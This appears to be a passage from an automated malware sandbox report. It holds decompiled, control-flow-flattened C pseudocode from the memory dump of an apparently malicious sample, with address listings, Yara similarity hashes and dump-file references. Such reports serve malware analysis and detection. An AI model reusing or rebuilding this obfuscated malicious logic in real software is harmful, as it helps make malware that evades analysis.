											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E0023568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E002329E3( &_v524, 0x104, E0024889D(0x24c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00242025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00244F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00238736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E0023C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E0023F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E0024388A();
								_t479 = E00240ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E0023B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E002380BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E002388E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x24c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x24ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x24ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}
























































































                                                      0x00234a3b
                                                      0x00234a46
                                                      0x00234a51
                                                      0x00234a5c
                                                      0x00234a64
                                                      0x00234a6c
                                                      0x00234a71
                                                      0x00234a79
                                                      0x00234a81
                                                      0x00234a8c
                                                      0x00234a94
                                                      0x00234a9f
                                                      0x00234aaa
                                                      0x00234ab2
                                                      0x00234abd
                                                      0x00234ad3
                                                      0x00234ada
                                                      0x00234ae3
                                                      0x00234aea
                                                      0x00234aef
                                                      0x00234af8
                                                      0x00234b03
                                                      0x00234b0b
                                                      0x00234b13
                                                      0x00234b1b
                                                      0x00234b23
                                                      0x00234b35
                                                      0x00234b3a
                                                      0x00234b43
                                                      0x00234b4e
                                                      0x00234b5a
                                                      0x00234b5d
                                                      0x00234b61
                                                      0x00234b69
                                                      0x00234b71
                                                      0x00234b79
                                                      0x00234b81
                                                      0x00234b85
                                                      0x00234b8d
                                                      0x00234b98
                                                      0x00234ba0
                                                      0x00234bab
                                                      0x00234bb6
                                                      0x00234bc1
                                                      0x00234bcc
                                                      0x00234bd4
                                                      0x00234bdc
                                                      0x00234be4
                                                      0x00234bec
                                                      0x00234bf4
                                                      0x00234bff
                                                      0x00234c0a
                                                      0x00234c15
                                                      0x00234c20
                                                      0x00234c28
                                                      0x00234c33
                                                      0x00234c3e
                                                      0x00234c49
                                                      0x00234c54
                                                      0x00234c67
                                                      0x00234c6e
                                                      0x00234c79
                                                      0x00234c81
                                                      0x00234c89
                                                      0x00234c8e
                                                      0x00234c98
                                                      0x00234ca8
                                                      0x00234cae
                                                      0x00234cb6
                                                      0x00234cbb
                                                      0x00234cc3
                                                      0x00234cce
                                                      0x00234cd9
                                                      0x00234ce4
                                                      0x00234cec
                                                      0x00234cf1
                                                      0x00234cf9
                                                      0x00234d01
                                                      0x00234d09
                                                      0x00234d14
                                                      0x00234d1f
                                                      0x00234d2a
                                                      0x00234d32
                                                      0x00234d37
                                                      0x00234d3f
                                                      0x00234d47
                                                      0x00234d4f
                                                      0x00234d57
                                                      0x00234d5f
                                                      0x00234d67
                                                      0x00234d6f
                                                      0x00234d77
                                                      0x00234d80
                                                      0x00234d85
                                                      0x00234d8b
                                                      0x00234d93
                                                      0x00234d9e
                                                      0x00234da9
                                                      0x00234db4
                                                      0x00234dbc
                                                      0x00234dc4
                                                      0x00234dc9
                                                      0x00234dd1
                                                      0x00234dd9
                                                      0x00234de5
                                                      0x00234de8
                                                      0x00234dec
                                                      0x00234df4
                                                      0x00234dfc
                                                      0x00234e04
                                                      0x00234e09
                                                      0x00234e0e
                                                      0x00234e16
                                                      0x00234e21
                                                      0x00234e29
                                                      0x00234e34
                                                      0x00234e3c
                                                      0x00234e44
                                                      0x00234e49
                                                      0x00234e51
                                                      0x00234e64
                                                      0x00234e6b
                                                      0x00234e76
                                                      0x00234e7e
                                                      0x00234e86
                                                      0x00234e8e
                                                      0x00234e96
                                                      0x00234e9e
                                                      0x00234ea6
                                                      0x00234eae
                                                      0x00234eb6
                                                      0x00234ec1
                                                      0x00234ecc
                                                      0x00234ed7
                                                      0x00234ee4
                                                      0x00234eef
                                                      0x00234efa
                                                      0x00234f02
                                                      0x00234f0a
                                                      0x00234f12
                                                      0x00234f1a
                                                      0x00234f22
                                                      0x00234f27
                                                      0x00234f2c
                                                      0x00234f34
                                                      0x00234f3c
                                                      0x00234f4a
                                                      0x00234f4f
                                                      0x00234f5a
                                                      0x00234f5b
                                                      0x00234f5f
                                                      0x00234f67
                                                      0x00234f72
                                                      0x00234f7d
                                                      0x00234f88
                                                      0x00234f93
                                                      0x00234f9e
                                                      0x00234fa9
                                                      0x00234fb4
                                                      0x00234fbf
                                                      0x00234fca
                                                      0x00234fd7
                                                      0x00234fdb
                                                      0x00234fe3
                                                      0x00234fe8
                                                      0x00234ff0
                                                      0x00234ffb
                                                      0x00235003
                                                      0x0023500e
                                                      0x00235019
                                                      0x00235021
                                                      0x0023502c
                                                      0x00235034
                                                      0x0023503c
                                                      0x00235044
                                                      0x00235049
                                                      0x00235051
                                                      0x00235059
                                                      0x00235063
                                                      0x00235067
                                                      0x0023506f
                                                      0x00235077
                                                      0x00235082
                                                      0x0023508d
                                                      0x00235098
                                                      0x002350a0
                                                      0x002350a5
                                                      0x002350ad
                                                      0x002350b5
                                                      0x002350c0
                                                      0x002350cb
                                                      0x002350d6
                                                      0x002350e1
                                                      0x002350ee
                                                      0x002350f2
                                                      0x002350fa
                                                      0x00235102
                                                      0x0023510a
                                                      0x00235118
                                                      0x00235121
                                                      0x00235125
                                                      0x0023512d
                                                      0x00235135
                                                      0x0023513d
                                                      0x00235142
                                                      0x00235155
                                                      0x0023515a
                                                      0x00235161
                                                      0x00235163
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516f
                                                      0x0023516f
                                                      0x0023516f
                                                      0x0023516f
                                                      0x00235175
                                                      0x00000000
                                                      0x00000000
                                                      0x0023517b
                                                      0x00000000
                                                      0x002354f8
                                                      0x00235187
                                                      0x00235193
                                                      0x002352e9
                                                      0x002352ef
                                                      0x002352f0
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516a
                                                      0x00000000
                                                      0x0023516a
                                                      0x00235199
                                                      0x0023519f
                                                      0x002352ad
                                                      0x002352b8
                                                      0x002352bd
                                                      0x002352bf
                                                      0x002352c2
                                                      0x002352c9
                                                      0x002352ce
                                                      0x00000000
                                                      0x002351a5
                                                      0x002351ab
                                                      0x0023525c
                                                      0x0023525d
                                                      0x0023526d
                                                      0x0023526f
                                                      0x00235277
                                                      0x00235279
                                                      0x0023527d
                                                      0x00235284
                                                      0x00235285
                                                      0x0023528a
                                                      0x0023528d
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516a
                                                      0x00000000
                                                      0x0023516a
                                                      0x002351b1
                                                      0x002351b3
                                                      0x002351e0
                                                      0x0023522f
                                                      0x00235234
                                                      0x0023524b
                                                      0x00235251
                                                      0x00235252
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516a
                                                      0x00000000
                                                      0x0023516a
                                                      0x002351b5
                                                      0x002351bb
                                                      0x00000000
                                                      0x002351c1
                                                      0x002351d3
                                                      0x002351d8
                                                      0x002351d9
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516a
                                                      0x00000000
                                                      0x0023516a
                                                      0x0023516a
                                                      0x002351bb
                                                      0x002351b3
                                                      0x002351ab
                                                      0x0023519f
                                                      0x002353b2
                                                      0x002353b2
                                                      0x002353b2
                                                      0x0023530c
                                                      0x00235310
                                                      0x00235311
                                                      0x00235316
                                                      0x00235319
                                                      0x0023531a
                                                      0x0023531c
                                                      0x00235322
                                                      0x00235323
                                                      0x00235342
                                                      0x0023534a
                                                      0x0023534f
                                                      0x00235352
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516a
                                                      0x00000000
                                                      0x0023516a
                                                      0x0023516a
                                                      0x00000000
                                                      0x0023531c
                                                      0x0023535c
                                                      0x00235362
                                                      0x002354bd
                                                      0x002354c4
                                                      0x002354c9
                                                      0x00000000
                                                      0x00235368
                                                      0x00235368
                                                      0x0023536e
                                                      0x00235439
                                                      0x00235440
                                                      0x00235445
                                                      0x0023545c
                                                      0x00235490
                                                      0x00235495
                                                      0x0023549a
                                                      0x0023549c
                                                      0x00000000
                                                      0x00235374
                                                      0x00235374
                                                      0x0023537a
                                                      0x00235404
                                                      0x0023540c
                                                      0x00235414
                                                      0x00235415
                                                      0x00000000
                                                      0x0023537c
                                                      0x0023537c
                                                      0x00235382
                                                      0x002353c8
                                                      0x002353ce
                                                      0x002353d6
                                                      0x002353d8
                                                      0x002353d9
                                                      0x002353d9
                                                      0x002353df
                                                      0x002353df
                                                      0x0023516a
                                                      0x0023516a
                                                      0x0023516a
                                                      0x00000000
                                                      0x0023516a
                                                      0x00235384
                                                      0x00235384
                                                      0x0023538a
                                                      0x00235397
                                                      0x0023539a
                                                      0x0023539f
                                                      0x002353a2
                                                      0x00000000
                                                      0x002353a2
                                                      0x00000000
                                                      0x0023538a
                                                      0x00235382
                                                      0x0023537a
                                                      0x0023536e
                                                      0x00000000
                                                      0x002354ce
                                                      0x002354ce
                                                      0x002354ce
                                                      0x00000000
                                                      0x0023516f

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
                                                      • API String ID: 0-2931794159
                                                      • Opcode ID: 7a7f98bca30409685479176b5e26eb01061cdbbb124fbbbea39531deb79342f7
                                                      • Instruction ID: 6ac2d1a0878addcab8fd7abec263e0a08a4fa2bd0025a29fd5845bef419dbaab
                                                      • Opcode Fuzzy Hash: 7a7f98bca30409685479176b5e26eb01061cdbbb124fbbbea39531deb79342f7
                                                      • Instruction Fuzzy Hash: E0322371518781CFE3B8CF25C54AA8BBBE1BBC4314F508A1DE5DA962A0D7B59819CF03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00238F78, Relevance: 15.4, Strings: 12, Instructions: 367COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E00238F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E0023BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00244F7D(_v552, _v580, _v540);
										E00244F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00244F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E0023F536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E0023F326();
										E0023F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E002317AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x24c910);
												_t378 = E002388E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00244F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E0023568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00244F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00238736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x24ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x24ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}


































































                                                      0x00238f78
                                                      0x00238f7e
                                                      0x00238f86
                                                      0x00238f8e
                                                      0x00238f96
                                                      0x00238f9b
                                                      0x00238fa3
                                                      0x00238fab
                                                      0x00238fb3
                                                      0x00238fb8
                                                      0x00238fbd
                                                      0x00238fc5
                                                      0x00238fcd
                                                      0x00238fd5
                                                      0x00238fdd
                                                      0x00238fea
                                                      0x00238ff1
                                                      0x00238ff7
                                                      0x00238ffc
                                                      0x00239001
                                                      0x00239007
                                                      0x0023900f
                                                      0x00239017
                                                      0x0023901f
                                                      0x00239024
                                                      0x0023902c
                                                      0x00239039
                                                      0x0023903c
                                                      0x00239040
                                                      0x00239048
                                                      0x00239050
                                                      0x0023905b
                                                      0x00239066
                                                      0x00239071
                                                      0x0023907c
                                                      0x00239087
                                                      0x00239092
                                                      0x0023909a
                                                      0x002390a2
                                                      0x002390a7
                                                      0x002390af
                                                      0x002390b7
                                                      0x002390bf
                                                      0x002390c7
                                                      0x002390cf
                                                      0x002390df
                                                      0x002390e8
                                                      0x002390eb
                                                      0x002390ef
                                                      0x002390f4
                                                      0x002390fc
                                                      0x00239104
                                                      0x0023910f
                                                      0x00239113
                                                      0x0023911b
                                                      0x00239123
                                                      0x0023912b
                                                      0x00239133
                                                      0x00239138
                                                      0x00239140
                                                      0x00239148
                                                      0x00239156
                                                      0x0023915b
                                                      0x00239161
                                                      0x00239169
                                                      0x00239176
                                                      0x00239179
                                                      0x0023917d
                                                      0x0023918d
                                                      0x00239191
                                                      0x00239199
                                                      0x002391a1
                                                      0x002391a6
                                                      0x002391ae
                                                      0x002391b3
                                                      0x002391bb
                                                      0x002391c8
                                                      0x002391cb
                                                      0x002391cf
                                                      0x002391d7
                                                      0x002391df
                                                      0x002391ea
                                                      0x002391f5
                                                      0x00239200
                                                      0x0023920b
                                                      0x00239213
                                                      0x0023921e
                                                      0x00239226
                                                      0x00239233
                                                      0x00239237
                                                      0x0023923f
                                                      0x00239247
                                                      0x0023924c
                                                      0x00239251
                                                      0x00239259
                                                      0x00239264
                                                      0x0023926f
                                                      0x0023927a
                                                      0x00239285
                                                      0x0023928d
                                                      0x00239298
                                                      0x002392a3
                                                      0x002392ae
                                                      0x002392b9
                                                      0x002392c1
                                                      0x002392c9
                                                      0x002392d1
                                                      0x002392d9
                                                      0x002392e6
                                                      0x002392e7
                                                      0x002392eb
                                                      0x002392f3
                                                      0x002392fb
                                                      0x00239309
                                                      0x0023930d
                                                      0x00239315
                                                      0x0023931d
                                                      0x00239325
                                                      0x0023932d
                                                      0x00239332
                                                      0x0023933a
                                                      0x00239342
                                                      0x0023934a
                                                      0x00239352
                                                      0x0023935a
                                                      0x00239362
                                                      0x0023936a
                                                      0x00239378
                                                      0x00239379
                                                      0x00239380
                                                      0x00239387
                                                      0x0023938b
                                                      0x00239393
                                                      0x0023939b
                                                      0x002393a0
                                                      0x002393a8
                                                      0x002393b0
                                                      0x002393b8
                                                      0x002393c2
                                                      0x002393c6
                                                      0x002393ce
                                                      0x002393d6
                                                      0x002393db
                                                      0x002393e3
                                                      0x002393eb
                                                      0x002393f3
                                                      0x002393fe
                                                      0x00239402
                                                      0x0023940a
                                                      0x00239417
                                                      0x0023941b
                                                      0x00239423
                                                      0x0023942b
                                                      0x00239433
                                                      0x00239433
                                                      0x00239433
                                                      0x00239438
                                                      0x00239438
                                                      0x00239438
                                                      0x0023943d
                                                      0x0023943d
                                                      0x0023943d
                                                      0x0023943d
                                                      0x0023943f
                                                      0x00000000
                                                      0x00000000
                                                      0x00239445
                                                      0x0023955a
                                                      0x0023955b
                                                      0x0023957f
                                                      0x00239584
                                                      0x00239589
                                                      0x0023959d
                                                      0x002395b5
                                                      0x002395ba
                                                      0x002395bb
                                                      0x002395c2
                                                      0x002395c9
                                                      0x002395d0
                                                      0x002395d0
                                                      0x002395d6
                                                      0x002395d6
                                                      0x00239433
                                                      0x00239433
                                                      0x00239433
                                                      0x00000000
                                                      0x00239433
                                                      0x0023944b
                                                      0x00239451
                                                      0x00000000
                                                      0x002396c1
                                                      0x0023945d
                                                      0x0023952e
                                                      0x00239535
                                                      0x00239541
                                                      0x00239546
                                                      0x0023954b
                                                      0x00000000
                                                      0x00239463
                                                      0x00239469
                                                      0x002394d8
                                                      0x00239511
                                                      0x00000000
                                                      0x002394da
                                                      0x002394da
                                                      0x002394e5
                                                      0x002394e7
                                                      0x002394f4
                                                      0x002394f9
                                                      0x002394fe
                                                      0x00239506
                                                      0x00239433
                                                      0x00239433
                                                      0x00239433
                                                      0x00239438
                                                      0x00239438
                                                      0x00000000
                                                      0x00239438
                                                      0x00239433
                                                      0x0023946b
                                                      0x00239471
                                                      0x00000000
                                                      0x00239477
                                                      0x00239485
                                                      0x00239486
                                                      0x0023948d
                                                      0x00239495
                                                      0x0023949b
                                                      0x002394b0
                                                      0x002394c1
                                                      0x002394c7
                                                      0x002394c7
                                                      0x002394cc
                                                      0x00239438
                                                      0x00239438
                                                      0x00239438
                                                      0x00000000
                                                      0x00239438
                                                      0x0023949d
                                                      0x002394a4
                                                      0x002394a9
                                                      0x00000000
                                                      0x002394a9
                                                      0x0023949b
                                                      0x00239471
                                                      0x00239469
                                                      0x0023945d
                                                      0x002395ec
                                                      0x002395f2
                                                      0x002395fa
                                                      0x00000000
                                                      0x00239600
                                                      0x00239600
                                                      0x00239601
                                                      0x0023960e
                                                      0x0023960f
                                                      0x0023960f
                                                      0x0023961a
                                                      0x0023961b
                                                      0x00239626
                                                      0x00239628
                                                      0x0023962d
                                                      0x00239632
                                                      0x00000000
                                                      0x00239634
                                                      0x00239643
                                                      0x00239648
                                                      0x0023964d
                                                      0x00239654
                                                      0x00000000
                                                      0x00239654
                                                      0x00000000
                                                      0x00239632
                                                      0x002396cc
                                                      0x002396cc
                                                      0x002396cc
                                                      0x0023965d
                                                      0x00239669
                                                      0x0023966a
                                                      0x0023966d
                                                      0x0023966e
                                                      0x00239673
                                                      0x00239679
                                                      0x0023967b
                                                      0x00000000
                                                      0x0023967b
                                                      0x00000000
                                                      0x00239679
                                                      0x002395e6
                                                      0x00239685
                                                      0x00239688
                                                      0x0023968d
                                                      0x00239692
                                                      0x00239695
                                                      0x0023969a
                                                      0x00000000
                                                      0x0023969a
                                                      0x00000000
                                                      0x002396a0
                                                      0x002396a0
                                                      0x00000000
                                                      0x0023943d
                                                      0x00239438

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
                                                      • API String ID: 0-964951681
